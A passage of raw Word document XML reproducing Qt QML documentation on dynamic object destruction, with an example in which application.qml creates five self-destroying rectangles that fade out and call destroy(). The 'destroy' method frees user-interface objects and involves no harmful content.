        <w:t>destroy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> method. This method has an optional argument (which defaults to 0) that specifies the approximate delay in milliseconds before the object is to be destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FC2" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4"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Here is an example. The</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application.qml</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creates five instances of the</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SelfDestroyingRect.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component. Each instance runs a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NumberAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and when the animation has finished, calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>destroy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on its root object to destroy itself:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9855" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2485"/>
        <w:gridCol w:w="7370"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A458A4" w:rsidRPr="00D815C8" w:rsidTr="0004074E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>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hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A458A4" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4" w:rsidP="00A458A4">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>application.qml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7370" w:type="dxa"/>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hideMark/>
          </w:tcPr>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QtQuick</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55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2.0</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Item</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id: container</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500</w:t>
            </w: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100</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Component</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.onCompleted: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var</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> component = </w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Qt</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.createComponent(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>"SelfDestroyingRect.qml"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>);</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for</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var</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> i=</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>; i&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>; i++)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var</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object</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> = component.createObject(container);</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object</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.x = (</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>object</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">.width + </w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>) * i;</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FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>}</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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A458A4" w:rsidRPr="00D815C8" w:rsidTr="0004074E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="75" w:type="dxa"/>
              <w:bottom w:w="75" w:type="dxa"/>
              <w:right w:w="75" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00A458A4" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4" w:rsidP="00A458A4">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>SelfDestroyingRect.qml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7370" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="75" w:type="dxa"/>
              <w:bottom w:w="75" w:type="dxa"/>
              <w:right w:w="75" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>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QtQuick</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55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2.0</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Rectangle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id: rect</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80</w:t>
            </w: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80</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color: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>"red"</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NumberAnimation</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> on opacity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to: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>0</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duration: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1000</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onRunningChanged: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if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (!running)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console.log(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>"Destroying..."</w:t>
            </w:r>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</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rect.destroy();</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FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>}</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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DB3FC2" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4"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lastRenderedPageBreak/>
        <w:t>Alternatively, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> could have destroyed the created object by calling </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object.destroy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FC2" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that it is safe to call destroy() on an object within that object.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Objects are not destroyed the instant destroy() is called, but are </w:t>
      </w:r>
      <w:r w:rsidRPr="0004074E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cleaned up sometime between the end of that script block and the next frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
